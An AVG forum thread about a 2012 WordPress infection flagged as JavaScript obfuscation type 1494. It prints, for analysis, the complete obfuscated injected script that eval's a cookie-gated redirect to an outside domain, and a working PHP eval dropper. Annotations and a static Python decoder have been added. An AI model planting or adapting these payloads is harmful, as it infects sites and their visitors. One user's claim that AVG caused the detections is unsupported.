AVG Forums » Other topics » Virus Removal, Tools for Removing » Exploit Javascript Obfuscation Type 1494
June 1, 2012 18:14 Re: Exploit Javascript Obfuscation Type 1494 #205795
vulcanmedia (Novice, Join Date: 1.6.2012, Posts: 1)
Exploit javascript Obfuscation on various sites..

Hi AVG

I am a web developer and I am seeing these warnings across many of my client sites.

Exploit javascript obfuscation 1494

Here are just a few of the ones (all WordPress):

vulcanmedia.co.za/ava
boxliving.co.za
perfectpartners.org.za
tracyrobertson.co.za
skipperscourses.co.za
imbasasafari.com

These are hosted with 3 different hosting companies, so I doubt that all of these could have been "infected". I've looked through these and didn't find any malicious scripts or viruses. I've run scans on various sites, all which reported that these sites are not infected.

Can you please let me know where AVG picks up malicious code as this is causing a very negative effect on my business.

June 1, 2012 18:23 Re: Exploit Javascript Obfuscation Type 1494 #205801
BIG AL 43 (Moderator, Join Date: 18.6.2009, Posts: 23756)
@ vulcanmedia

Please note this has now been covered in Weekly Overview: 23/2012. Subscribe to this RSS feed if you want to be notified about new Weekly Overviews.

Also for your info..

Your posting will no doubt be monitored by the relevant AVG Team. This Announcement post AVG's Community Team Availability is situated in the 'Information' forum area. Please bear in mind that it's now Friday evening [time 20:23] & also the weekend in Brno, Czech Rep. Weekends are not classified as workdays.


AVG Forums Volunteer Moderator
AVG Forum member since Nov. 27, 2004
My total posts on the Old AVG Free Forum: 27,063
Alan
How-To Articles | FAQ | Free Support
June 1, 2012 18:42 Re: Exploit Javascript Obfuscation Type 1494 #205805
malwareremovalservice (Novice, Join Date: 1.6.2012, Posts: 3)
JS type 1494..

Seeing a rash of sites come in through google webmaster tools and on some of the security forums that contain the following:

<script type='text/javascript'>
st="bno3nt-en0oen0apno3rxrpno3rxen0d";   // filler string, never used
// Key table: after a.join("$").split("%") every entry is a hex nibble followed by
// the punctuation symbol that stands in for it inside the long string c below.
Date&&(a=["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~%8?%6&"]);
// b stays an empty array; c (next line) is the symbol-encoded payload.

var b=[],c="&!^<^]$$&)&~&_&)!:$$^@$|&:&&$?$]^<^]^]&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!@!?^+^]^!^$+*^&^@!&&<!$$|&^^]&_&*!!$|++&<!+&*^@&^$_!^&*!+*+&:&]&*$?&^$_&!&*!+*+&:&]&*$?$:$:^@&*&+^]&_&*!!$|++&<!+&*$?&^$_&!&*!+*+&:&]&*$?$:$@!?^+$:^@&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*^]&!^<$@$$^]$$$@&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:$@$$^@&*!?!|&:!$&*!^^]$$$@&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$@$$^@!|&<!+&?^]$~$$^@&!^^^]$$&?!+!+!|^#$~$~$$$@!^!+$_!$&*!|&)&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$@$$$~!+&~!|^$$_&?!+&]&)$$^@!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?$:!@!]^@&?$_!|!$&~!+&~!+!:!|&*^]!@&$^#&&!*&_&^!+&:&~&_$?$:!@!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!@!&&<!$$|&&^]&+&~&^!*&]&*&_!+$)&:^]!!&:&_&+&~!!$)&!^]!+&?&:!^^@!+!$!:!@!&*!^]$$&!&*!+!^&*!++<!+!+!$&:!^&+&&$$^@!&&<!$$|&<^]*@*]^@&+!)!)$?&*^]$$^|$$$:^@&<$_!|!*!^&?$?$$&?&*&:&!&?!+$$$)$$!^!*&$!^!+!$&:&_&!$$$)$$!+!$&*&^!$&*&<!+&*+*&)&*&]&*&_!+&!&*!+$$$)$$!!&:&+!+&?$$$)$|$$!&&$&]&:&&!$!^&*!+$$$)!&*!$)$$&$&~&+!:$$$)$$&<!|!|&*&_&++^&?&:&)&+$$$)&*$)&&$)$$!^!$&^$$$:^@!&&<!$$|&#^]&<*@^$*]*@&<*@^<*]*]$?^^$)^<^&$:^@!&+@^]&<*@^+*]*@&<*@^<*]*]$?^^$)^&$:$@$$&<&]&*$$^@!|^]&<*@^**]*@&<*@^<*]*]$?^^$)^<^<$:$@$$&$!*!+&*$$^@!&&<!$$|&@^]&!$_&$$?$:$)&$^]&<*@^:*]*@&#*]$?!&+@$:^@&$*@&<*@^<^|*]*]^]&@^@&$*@&<*@^^*]*]^]&<*@^?*]^@&$*@&<*@^|*]*]^]&<*@^?*]^@&<*@^:*]*@&<*@^&*]*]*@&<*@^!*]*]$?&$$:!]&^&<!+&^&?$?&]$:!@&&$_!!!$&:!+&*$?$$^)&?!+&]&)^_^)&$&~&+!:^_^)$~&$&~&+!:^_^)$~&?!+&]&)^_$$$:$)&:$_!^&*!+*+&:&]&*&~!*!+$?&&!*&_&^!+&:&~&_$?$:!@&!$_&<$?$:!]$)^$^^^^$:!]!]!]^@!&&<!$$|&)^]&_&*!!$|&?^@&:&&$?!!&:&_&+&~!!$_&_&<!&&:&!&<!+&~!$$_!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&]&<!+&^&?$?$~&&&:!$&*&&&~!?!)&]!^&:&*$~&:$:$:!@&)$_&<$?$:^@!]$|&*&)!^&*$|!@$|&+&~&^!*&]&*&_!+$_&~&_&]&~!*!^&*&]&~!&&*^]&&!*&_&^!+&:&~&_$?$:!@&)$_&<$?$:^@&+&~&^!*
&]&*&_!+$_&~&_&]&~!*!^&*&]&~!&&*^]&_!*&)&)!]!]!]^@";

function e(){
  // Build the substitution table from the key strings.
  e=a.join("$").split("%");
  // Replace every symbol in c with its hex digit, so c becomes a plain hex string.
  for(var d in e)"string"==typeof e[d]&&(c=c.split(e[d].substr(1)).join(e[d].substr(0,1)));
  return this   // returns window, used below to reach decodeURIComponent
}

var f=e(),a="";

// ~b-~b is 0 (b is empty); regroup the hex string as %XX escapes.
for(_E=~b-~b;_E<c.length/2;_E++)a+="%"+c.substr(2*_E,2);

// Percent-decode the escapes and execute the recovered script.
window.eval(f.decodeURIComponent(a));
</script>

This has been going on since yesterday. After some research it seems it sets a cookie and only displays it once, and has a redirect to bent-goga.r.gd/top2.html

EDIT 1.. Forgot to mention, these are all WordPress sites, assumed to be running the latest version.

I think the reason it's so difficult to detect is that once it sets the cookie, you won't see it again, so it makes it hard to track down. I haven't gotten my hands on an infected site yet to clean out, but when I do and I can locate the code, I will post more.
CJ Chamberland
Malware Removal Specialist
EDIT 2.. ---- signature commercial link removed ---- Not allowed on this forum. Please remove from your signature.
June 1, 2012 20:42 Re: Exploit Javascript Obfuscation Type 1494 #205819
Egaladeist (Novice, Join Date: 30.5.2012, Posts: 57)
There are two problems with the theory of 'one IP'. Assuming that the first visit by an IP picks up the problem, then is clear of it from that point forward, and the site then 'appears to be clean'.

First problem...then those of us on a static IP should only see it once. I've seen it on three different occasions and on multiple occasions on other sites like productforums.google.com...with the same IP.

Second problem...assuming that this ' one IP ' is accurate...all these other scanners and web safety sites should have picked it up on the first scan...even if they didn't on later scans...and why didn't Microsoft Safety Scanner or AVG pick it up on a computer scan of a downloaded folder.

I also find it very hard to believe that this issue has somehow managed to fool everyone, including firewalls, but AVG LinkScanner. That no other anti-virus company is pushing up warnings.

If I was a suspicious person I might suspect the reason why AVG picked up on this so fast and is ahead of everyone else is because you somehow caused it with your AVG users, infecting us in the update, or probably to scare people to buy your security package which so conveniently and prominently is displayed alongside the warning.

Are any of these conversations happening over at COMODO, or Kaspersky, or Avast, or Symantec? A Google only turns up AVG results.

I keep hearing that this is a Wordpress problem, but then we'd be hearing from other sources, including and especially Wordpress, who would be frantic right now trying to get out a security update; it seems like it's specific to AVG and AVG users.

I don't see anything on Wordpress or Wordpress forums about this. And that would be highly unusual because if it was a Wordpress specific problem then it'd be booming over there.
June 2, 2012 04:16 Re: Exploit Javascript Obfuscation Type 1494 #205841
malwareremovalservice (Novice, Join Date: 1.6.2012, Posts: 3)
So after further investigation - this is how it starts out, in random files:

$lqxizr = array("eNqtWgl32siy/iuMT05sXjyOWg","ugccjFjsHGsWDAgIGZHA4I2SzC","cFjCkuS/v+6q6tYCduZObhKQ1K","r+urq2riqSGD4mTn57XD27y+H0","ueNthovl4uR4qx0nk4lvCfkisd","VO3gyT3950sxfzeXd7cnycODuu","Pdjikuo+bBYtcXef0e5G4ubiSX","x/vhbfpa+95uWgf+0PxVPvup4u","5lkNyOv1p/IncWeuy9tLcdPsPl","jiOu4Z/Z24KeatevGqtXLEw6dx","9vj02NUL4mHSbtjLnl71+VDPEC","OXfs+3YZVWs+S3r31xu+WvuzdV","cau5V+Iy/XonLmvxlRWA/F9xK5","4yI357t5aD4h8fRWoYDN1WHkqj","dhOY1u7qm0Fv0meth75fHnI2ho","yJF+52/dR+MNNuTVvfjeow+aoC","PACEDvJb9WA7jRGX0dceyG/6BF","S6+Np8BSi4r5c+PWmf+VTYSGVa","Auk9AUOf8PKnGLm+ha0XQWiws3","e4nzttIx4BsqUXNHHtPtir5tX0","K20XVHNtj1rN6qynmynQAihVCe","yqghdiAlZ5UlLjT7dDxygNWyOn","lt/cgkYcUGsZ1A62MiqrxdxJcZ","eHreKcC8bnA598/gTWB1vIbxzY","TGtUqj2J1WrXIEBgFYxLsHt6XG","0AD/ewACsKSq4rF5Q3KmqwcGO9","egDQ1hIYa7Ce80mzmnxcPD/sLp","blBohnLqbvQKDu3SivNT9ZPede","A4NpAtQCFHtX8/tiGsKJb4ZL+g","swNf5eXPqf0X5Ku6qLzpIHqJLg","SNzsQM5i9TksJbi6X+AmGnxKA8","wF/AEkq7FmMJWmiYfoVHgtVmzj","RvyA6c9MyCJYFVbqi71anCmw0E","AksGJoBXhWq4BEb13lNSNnzfcA","qglIl2J1KRIpDmc3gGElJWRqic","riTAlpC3GAsQkYcQOrOjUwT64Y","c+OAQTVI1+0IJISkdRasmE8rA2","kJmR3lDcdfr9AmhZiK21Lg6w7p","ia8AZupcXZI5wMpMKQQC03rljP","ImeUJpV0BSYAisXAfkhiQt7oDx","XQVWArILCwUMq8l7sBJnB3sJST","i/VqtX1N5gZdBhcVNigQ6dGvhe","SCmgOzkN9XdJIhlvBGNgzrRfHC","8yskV8hHAN5sXJdSFFZ1TZooWT","lEB6lkOM8NcgBtg2Tg8Jeaf8io","RduhL6yDNOvisHMcipjVlTxTfT","woWLVmhsqwwft8VD8FosWobA5Y","OFOxjKUO55U8q6XCBjuBoQ/2OL","5MplKHjZAPIoLJhbIe81kZWv/P","DuIR4jjxDQhLVund1FoK22NKed","I80IrNFlKKhKSEgmbAMsjpPVXE","ADmMBoMVo4O5IlCJPbwqpcq+Br","5RRSr5uIDcPiGJbJ7relqzx4zl","VByG6nFmyELcxl6KsgSMO5iBol","CE0otEW2be5KhTVNdTSBDmL3pc","do5QYxM6qDp5RGY2WviBbew45b","2cppLPS72gA2h4Exz0MXw2gA+/","JlNEBRgMfvlIHWfOEZG4ir0YMA","+Byp09BCc2pILa/LJL3gIIB46o","BLoz3j/lQIkMcSE4wHDF/IUByL","CKY4J5yRY6JaIcgDJyB0DMM8/O","ioA2FiPjHn7EJ6sR52LRlb5RQg","V+4iFeAYfJyTP8nzIUIO6A45nS","CDfCSKDJJR5EHkgpC1Cbm7hVtv","HV5J+iwED0bS1KRO0FjkttHbgL","mKLiWl6IJjEdWZJxK5fbl1yLg2","UmJ4BrYOi6BOwpV7eJJHpTTVuB","hwhboRDmGUkES2T/tSDFL8p+lK","8Mjc/qpqH0o
0O2lnFIgs9Ckn7A","jwmkFk2e3lIOC8IgCZ6BtMHrL8","KFfRuTSSsR9IiT/MMRxfTgGVBg","nRLeVXFNpqpPF9UhGdwfd5PC2J","CA33kBAgI+GjGxY1ZGDHsCbiV2","VNhmI6T7GDEyKjDEAgOBG5lf0A","M3WIwaWrlkovuQ9TNATSUk3lFl","uHagoQO8h47RTkaQgMkj+blPYW","lfZqSksYPa4gM9PKMmjyfQQ5kK","WEh2TKGMrhqI4upKkVxuE0g580","bRnOmEP7kbYCK6lTcoN7cbaSd1","Sbg2eEOmORAUDJG2SFm3ItT7nb","NnzYR8+IoiHd3HkKHfyV8CGPZ/","FoEE7IkAy0tKYFjfDZVpKZIZ4F","4bScpxVwmJZqIl/Ib0riyN6Nw/","bBNWYSqomo8tgYa9EUlTzmFjON","gqo6V5E0TuQMYtuVkPdg+o2a40","f21WUobhZ3pcBg8fB5YlIl3D7C","yCg89Msg8W1I29iVVA5BkVjmET","XITAI/BIbWIn9Am3FYNCOn5B7q","O5WZl2timms1w6EV/ZSqD3RrPI","sjTKIbPGlBpjVAKTZidQHtJwh0","gFyGPYEFGJJRgCRGI6clHOdWcM","o0wJdVnMQsDIV96Up1OUoULem7","QQaGKRaor1aQlePWaYQRHeXTpZ","qTDafUlNeD6XGXCaoONzhNoBjZ","OiMVpnaCvCSzRDxohLpKEdtpoZ","eB4zGllpqw0IqmcobQQjXMNUuj","cDZb2cnKwMGDA0UtSdVJvY4k44","L8IqLk7k1Vc6NDbd3+2sa+hw+9","HrhlwNAzKEpQ9QC4tGpNbBHGWt","AkwFvjdtDX11L8LjaGoDvQhnZU","Q1QF7sQe9gylpO6N+K6CAFxsWi","26D41V/wLcsWU0tj1cG/pP1wMR","crsP1tgDe79cYBsFil9IPVrA36","2Il33Ygb1t30CpsG03eZWFy4Iy","9AGGrgk2Zvo30NDqG33DNaooyc","Db3RtQg9YFJu2VoGzCkoueaLCd","ouPTRntB7i3eCkxxe+OvvKjQ+7","D//qylNxbtpgqh7gRsd9mabDgT","Kjp5DzC8al83RJUL3ntz6/cmFY","UH+vC3/aYjRdx7KCz6emHbjhap","KJ2+T5J+LDR20KBoUhNhDEs9t7","EriBZ6NeuppPHGeWqC7dkZ0EEl","GkROj5v+cnDXnF2C+TdmfW9XXz","wGkfYO21Z30EkxxW193Kg26o1a","o2CrHL0+hgq1DRq2RJPwvlCFdl","69YBdrrFQXjTejbtOuGnh6Vvgj","3jZK9aBybeQhdlaqef9eNRqpf+","ZG2mhoi/66XVHpQ191J3tkA70b","VUIDS+NGqQYLgPUUmlohXy1APi","GYBpKC3ahrDRWrQZIaSPqmWgdJ","1yWaVrpXdI3LelMD9dzW8o1ypc","4KQaMU2XvABJ91kU0gfqiK1iK3","rbHqoAatV7l80Jdpo28PWiQRo7","olqfSvGysgaCnafP+hXwm5R1Xr","Bo5aDmz2LuiT3m0tsKNe8wIfQa","kaPUZlzGkhmrUeIKxPSRH316rp","gQ7BxvLIurpYO7i6uIUh6jDUeM","53Edk4DAWqxVD8tI6VzI4YQqp+","IKVIjxNEXiQKiFiVcEsYcrdgaW","k4IIQbMJy+AcHpsXvdgGjUDoRI","QcpvgacuHznpI7gaJ22DzdiLnm","pWF8bHyfO5t1zNnxO97sJLmZ2+","50773smb7l9vhl+S5z8SPxLDxw","O/ObgDzx131rPOwOv2O/602z9O","Jr+pXyD2X58kvx0GcqMT3ZM323","JHS34TF5bdaida8pzP3J+4mvud","4fNwKeYLYj2rhk6S53C/8JbT2R","IQ9dNP9epd
+c9ah19OcY1XiG7y","F1f56ul8unrucw5eI60VnXy5Xp","O079JnVvjz6txqvlavlmrVi9J9","IVjunXamW7GvV2Hq9/nqxXW+VI","ONMRDYbyc5LorOk7c84UJkyeT3","7+EBPcn/fMu9jFko392VH+7Kny","5qxXIpxJoR+fPzAc75j1fWcS6a","1fxVsXofWiIV/pP++QBfQoAaaA","HexkMr0klmrj9deHKEiwZoE79l","s4nHrr/wkt/IB2D8/McPjw8mDt","nc42Lqjqcz71nY3JM/7XV9mGTC","8lp2sZx35t7M77qekLGRPOXfZl","KaG4eczb2nzqS7dAeCwEqeHsG7","I7JhKwuPBJfzNjNfuCMnTSkUfA","fff0n7/HKOs8MMAIVgII1TLTQL","uE18/57AGy4ETpJR6/MHmytMPK","Sy3FYG08Wyt33uTgiQvxPi+fYK","gQJiGiGls0pyQJRSus5oyFwGvm","01br0TFs+343Unwm46y+HEm67Q","eNIxMlJpmoKGlj26ztdofze12p","/v2Zn29/zv56NzfJ84yx7dcLb/","AJq9V1Xv0Zt78z8Sg+Vy9sf790","AEaDFKITnGkqGp9YU3//3iyXsm","bHZoBjfCx9mK2xPuBV8mz9eDoe","/xCOlN5XZoP0xMfOSiXsR2n2H2","mf7St3C7x8Dy08Qmi1gVM1D8jC","lQ9o6ROzE9i+9CZkaiNok1PQv2","a37ozRPvP+L338/46gh1z2libs","FM8Atm0dqBUwZLcRcXcc9KfqGV","jBgvnMsvIVPk7wVkim9aYhlSfD","jTCFPTmA7UUZ9kaXJKvgPSQNQT","WSbg+4Av/psI+eWAwzP7H3i8GZ","etroFsdRblkZlCPDo97c+SZmCe","onZlVqCOYxJeKFAyxiMljnruYC","osW+cTeahcihcHD/u+t7yMHPdi","ALVlIQMpUlo624X/uiBQLdxSCi","9pvGTwYsPFwF0bDC86XjD8Gmht","BqIYiGIgioEoBqKYiGIiiokoJg","VxRDERxUQUE1FMRDERxUIUC1Es","RLEQxUIUC1EsRLEQxUIUC1FSiJ","JClBSipBAlhSgpREkhSgpRUoiS","QpQ0oqQRJY0oaURJI0oaUdKIkk","aUNKKkESWDKBlEySBKBlEyiJJB","lAyiZBAlgygZRLERxUYUG1FsRL","ERxUYUG1FsRLERxUYUpml0ZXTV","6WrQlYKLZtE1JaNZJjAppqXpbY","auhM4InRE6I3RG6DJ0MUJnKboS","HiM8RnjkjkwnPJ3wdMLTCY9snJ","GRM7JyRmbOyM4ZGTojS2dk6gyy","LPSjLISzcLglD2CGDLgW0drZ5X","zlnT9O+SnLgx86XqK7AP/mrHMf","5gfh0/DkCAeOpI+Sk9pZyJ/Oe3","z+OAi8djKCmFGILEDEZ8lOKBV7","FTjRfe7/hgCwoZTaUGxidEqChz","ufUg9O+yErQ7V+lrZiX3tI4ZBn","n78Q2OaTzvyx88gP8Eh4C4Zxwz","pVKkZWjE1ETiNfyCNQN7MiTeoP","5/JN8htmBsCPyFrxhZXlwukrOl","Ok8xLD4mSQavA49/ZtIjaWEWPD","RYgvsWt3MJn26TFIBsyU/HADWz","37w+exnMJlAelFiIXzH8vpivSu","66e4V7okX5LdcujNI1ITAwiRwr","mYI3FfQOnZ2cmyM+d6PZGHYTh5","CSUwBh6aeobQgtzhzIx/eKKBcz","A10NOxOeq9ns296fB6q5Gv/gXi","tOksNoyXVlNsfUkmzmbT9YmyP/","ybPI1lPSr74fR7rEdziZ88J78k","ziDl0iTUHnv/Jl8hWZgxWZgiKQ","s5zP5i+pkV/oBE4jtkgunYoKHG","DvCftmJfC
tbQaJYdvcpxgxFanP","4n8C9SBwLXJaRx8q9FofNkPvb5","72TDODYLYRsmXfUX3XGxXYgeQW","fpTWYd7tsR14y/PFExx7BEMeg9","f8UMn59HyXBVbZ0fpjP/IZ21R0","dEghNefJ50OoXiXb7TgZMOopUo","4HmEkxtDer6ZUBTjz9Jc+WZUDS","uGZdynU+CwrLxNRDreBqdTEmuk","oSbhWSIU3pzR5VYSgNwO4HnQDs","upFoaBIdCg8o1DjqbDZ5QJ1SHi","HeThhxAXA8/Hjohsk3GIXDAq+X","kFYbvgMgaupr3OYtmdi/ZaDofV","dInMSYR9uNNnrjs+nVPyIX6edV","zf6z6fvLLQrLtYLAfz1d5S8sUv","LJbjx93cW0xXc2qMGJlsbqb6EV","zKIFEbmmIh3VlBXZ5ThbmRUUS8","Ms89inOYXgSNCaaLD/S+ZkEVzq","cGPO1LYD51O9heevv2MMuSQrKN","KW28aM5+TAS5LlUizBItP7QYO7","5NA0x0nyPYG3Cz/4qL41glJ2Hx","2KHYqcc/PBS9IDz7l04kJXndSo","U/QgOqoXdgF6Kt8ksb3GvUxjao","+jY/k0uwA808y7z0DftBO4iZlY","xYg+XEX8w8d9j13UF3TouLIAH9","GFNDlZvUC+D5TvgI57UppjPx8Z","RsOeixF2n5whBtheXUn64pf2Mq","qzUZNRoZL3Op9xgM2XLI1OUYr3","9lvH9e+f45nmuhCo4qY0alMaPa","mFFxzKg6ZlQeM6qPGRXIjCpkRi","UyoxqZUZHM0gYeIb8NFwtvefKm","86lc/lzM/4UilDo2eQa0fyaqPq","tpKrLw+WLKPgy2e00TU4a0GW6u","xl9S+zYXP9NMWbLwqiIXLSv48u","e5yVgm6CbVfWaKE0IQwead9X5+","hHsW3pJ7XM+HSwLAuJhOw3hgb/","x8Pc8FBYMZKhjSEdf82bPAxZIh","xEqsbMgFNYVpvvbSir/ck1ewSP","K/Ugy41w9MsbKHU6wg1drLzzLY","N/1V1R0WuMVY8ldkhDGBH6b97h","LbBWmbyiczExrNaHLUzkoxIhG2","ty1NDS+5H0ReYUllZn7/hQCPES","D9YkGnW7GvvWKLnaXin6Dw0g+U","WhqPubHPa1XIgZNgP6EXpRMcRA","esUsrNYkc8IKK+0omPGBAzTFby","fOwDjenJA4TGAULzEKF1gDAFvw","rG+hZgfTy5PZpPEr/PHxPE7/8d","Ybf9gGHbLxv2XhDCCRBoMj8LNM","EPREwTBdEL38mfGT2lhCLSdXvB","Lt++PbAZngN+/w6ji+HOk0MfQm","YV+W3yJ88y87L0bM51T17udaiz","09Jl5yYDnZvYL/VAEe+g/VO5Wx","rK3d4P/EeIfPSqQvj8/4lCQi85","ZFxbkL6FswEIWhbfY1QWqLpISU","Daoh8lTZSKtFEctKjTF25aWqZs","WvK8R5RqueV8iNUOH+CyxqSGVG","lhH5W6lT+of5gLftw4JXKlUvjd","FRt65IPMFkMCh06mQ/5hay/oyW","R/Px/QlPxhhtmMhzf60cfr4v8I","EC34WCPtXdpS/0JNNU3j63KAow","8Ldz6cLRPL7czLHi+9zfL9qPu1","i6PHH1ErH97j80fxy+ePH5Gs0z","ZeT6py3X6/04U8HHmkbE78MhDn","9VASffpah4/LLvGfj/8PWGX41A","=="); 
// The /e modifier makes preg_replace evaluate the replacement as PHP; the escaped
// string decodes to: eval(gzuncompress(base64_decode(implode("",$lqxizr))));
echo preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x69\x6D\x70\x6C\x6F\x64\x65\x28\x22\x22\x2C\x24\x6C\x71\x78\x69\x7A\x72\x29\x29\x29\x29\x3B","."); ?>

Which then gets decoded to my previous post... it's basically encoded, then jsunpacked, with URL encoding. It's not a false positive, and it's not a scam on AVG's part. Check your files and clean it out.

CJ Chamberland
Malware Removal Specialist
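A static decoder for both stages described in the two posts above (the PHP dropper and the <script> it produces), added here as an example; it is not code from the thread, from the poster or from AVG. KEY_TABLE and SAMPLE_PREFIX are copied from the posted <script>; build_constructed_php and the fixtures built with it are hypothetical. Nothing is eval'd: the symbol substitution and percent-decoding of the <script> and the implode/base64/gzuncompress of the dropper are reproduced as plain transformations.

```python
import base64
import re
import urllib.parse
import zlib

# Key table copied from the posted <script>: a.join("$").split("%") yields
# two-character entries, a hex nibble followed by the symbol that stands in
# for it inside the long string c.
KEY_TABLE = ["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2", "%7!%0|%f~%8?%6&"]

# Opening symbols of the posted string c (copied from the post above).
SAMPLE_PREFIX = ("&!^<^]$$&)&~&_&)!:$$^@$|&:&&$?$]^<^]^]&+&~&^!*&]&*&_!+"
                 "$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!@")


def symbol_map(key_table):
    """symbol -> hex nibble, mirroring the split/join loop in function e()."""
    return {e[1:]: e[0] for e in "$".join(key_table).split("%") if len(e) == 2}


def decode_js_stage(encoded, key_table=KEY_TABLE):
    """Stage 2 (the <script>): map symbols back to hex digits, regroup them as
    %XX escapes and percent-decode, which is what decodeURIComponent did
    before the result was handed to window.eval. No eval here."""
    sym2hex = symbol_map(key_table)
    hexstr = "".join(sym2hex[ch] for ch in encoded)  # KeyError: not this scheme
    pairs = [hexstr[i:i + 2] for i in range(0, len(hexstr) - 1, 2)]
    return urllib.parse.unquote("%" + "%".join(pairs)) if pairs else ""


def encode_js_stage(plaintext, key_table=KEY_TABLE):
    """Inverse of decode_js_stage, used only to build constructed fixtures."""
    hex2sym = {v: k for k, v in symbol_map(key_table).items()}
    return "".join(hex2sym[n] for n in plaintext.encode("utf-8").hex())


def decode_php_stage(php_source):
    """Stage 1 (the PHP dropper): the /e replacement string is
    eval(gzuncompress(base64_decode(implode("",$lqxizr)))), so implode the
    quoted chunks, base64-decode and zlib-inflate instead of eval'ing."""
    m = re.search(r"array\((.*?)\);", php_source, re.S)
    if not m:
        raise ValueError("no array(...) literal found")
    chunks = re.findall(r'"([^"]*)"', m.group(1))
    return zlib.decompress(base64.b64decode("".join(chunks))).decode("utf-8")


def extract_c_string(js_source):
    """Pull the symbol-encoded payload out of the recovered <script> text."""
    m = re.search(r'c="([^"]*)"', js_source)
    return m.group(1) if m else None


def build_constructed_php(inner_js, width=26):
    """Constructed fixture (hypothetical, not from the thread): wrap inner_js
    the way the posted dropper does, as 26-character base64 chunks."""
    b64 = base64.b64encode(zlib.compress(inner_js.encode("utf-8"))).decode()
    chunks = [b64[i:i + width] for i in range(0, len(b64), width)]
    array = ",".join('"%s"' % c for c in chunks)
    return '$lqxizr = array(%s); echo preg_replace("/.*/e", "...", ".");' % array


if __name__ == "__main__":
    print(decode_js_stage(SAMPLE_PREFIX))
    # -> g1="lonly"; if(-1==document.cookie.indexOf(g1)){
```

Run on the full posted string c, decode_js_stage returns the cookie-checking script the poster describes; treat whatever it returns as text to read, never as something to execute.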

June 2, 2012 04:34 Re: Exploit Javascript Obfuscation Type 1494 #205845
malwareremovalservice (Novice, Join Date: 1.6.2012, Posts: 3)
Egaladeist wrote
I don't see anything on Wordpress or Wordpress forums about this. And that would be highly unusual because if it was a Wordpress specific problem then it'd be booming over there.

WordPress exploits are not necessarily towards the core WordPress system, it is fairly secure. It's when people start piling on plugins, and don't have a basic understanding of security/file permissions, that the problems start to surface. Like using the default table prefixes, using "admin" because it's the default, weak passwords, etc. Just because you can point and click to install WordPress, it doesn't make you a WordPress nor a security expert.

CJ Chamberland
Malware Removal Specialist
June 2, 2012 06:44 Re: Exploit Javascript Obfuscation Type 1494 #205851
Egaladeist (Novice, Join Date: 30.5.2012, Posts: 57)
malwareremovalservice wrote
WordPress exploits are not necessarily towards the core WordPress system, it is fairly secure. It's when people start piling on plugins, and don't have a basic understanding of security/file permissions, that the problems start to surface. Like using the default table prefixes, using "admin" because it's the default, weak passwords, etc. Just because you can point and click to install WordPress, it doesn't make you a WordPress nor a security expert.

That in no way addresses my statement that if this was something specific to Wordpress sites then the Wordpress forums would be abuzz. And they are amazingly silent on this issue. So silent it's as if they aren't even aware of it.

Up to this point...

this entire problem seems to revolve specifically around AVG. No one else seems to be aware or even concerned about it.

Even the 1000s of security forums (one of which I help administrate) seem to be strangely quiet on this 'outbreak'.

Don't you find that even a little odd?
June 2, 2012 07:28 Re: Exploit Javascript Obfuscation Type 1494 #205855
ondraploteny (Administrator, Join Date: 27.3.2009, Posts: 6996)
Hello,

Please be informed that this malicious JavaScript Obfuscation (type 1494) is known by AVG LinkScanner since 2nd April 2012 (thanks to AVG Web Threats Researchers). So it is more than worrying that no-one else has yet noticed this particular obfuscation is being used to spread malicious content.

Our database has about 29 thousand hits per day of this detection from our users (who have automatic product feedback providing turned on). So more than 30 thousand AVG LinkScanner users protected from being hit by the malicious content. And that is our job, to protect us (= users).

AVG Web Threat researchers have yet again confirmed that these sites are serving malicious code and that our recommendation is still that the site owners should look for proper, local, professional computer security assistance to fix their sites. As clearly they are unable to even find the malicious code on their own servers, much less work out how it got there and what additional steps they will have to take to properly secure the site beyond simply deleting the code responsible for serving the malicious JavaScript that our superior product will continue to detect on their sites until it is properly removed.



AVG Team
How-To articles | FAQ | Free Support
June 2, 2012 11:32 Re: Exploit Javascript Obfuscation Type 1494 #205875
zonetrap (Novice, Join Date: 2.6.2012, Posts: 11)
Same issue here.

On WordPress, getting the same Exploit JS obfuscation error 1494, but there is no code in the WP theme files. The error pops up, I move from page and then refresh and then the site is fine. Something to do with the IP.

But when the error shows, I still can't see the bad code.

Any ideas here?
June 2, 2012 13:27 Re: Exploit Javascript Obfuscation Type 1494 #205893
Egaladeist (Novice, Join Date: 30.5.2012, Posts: 57)
ondraploteny wrote
Please be informed that this malicious JavaScript Obfuscation (type 1494) is known by AVG LinkScanner since 2nd April 2012 (thanks to AVG Web Threats Researchers). So it is more than worrying that no-one else has yet noticed this particular obfuscation is being used to spread malicious content.

Yes, it is somewhat odd, as I mentioned earlier. In fact now that I know you've known about this since early April that makes it even more odd.

It is odd that Wordpress seems totally oblivious to this security breach that only affects Wordpress sites, it is odd that no other anti-virus or security software or online support is picking it up, it is odd that all these safe search sites and online scanners other than AVG seem to miss this threat, it is odd that even AVG itself has conflicts in picking up this threat...case in point:

my site has been cleared by AVG ThreatLabs (see previous posts)
a downloaded folder scanned on my computer using AVG failed to pick anything up
you yourself said ondraploteny, in post #205207, and I quote,

ondraploteny wrote
I have re-checked mentioned website with no detection

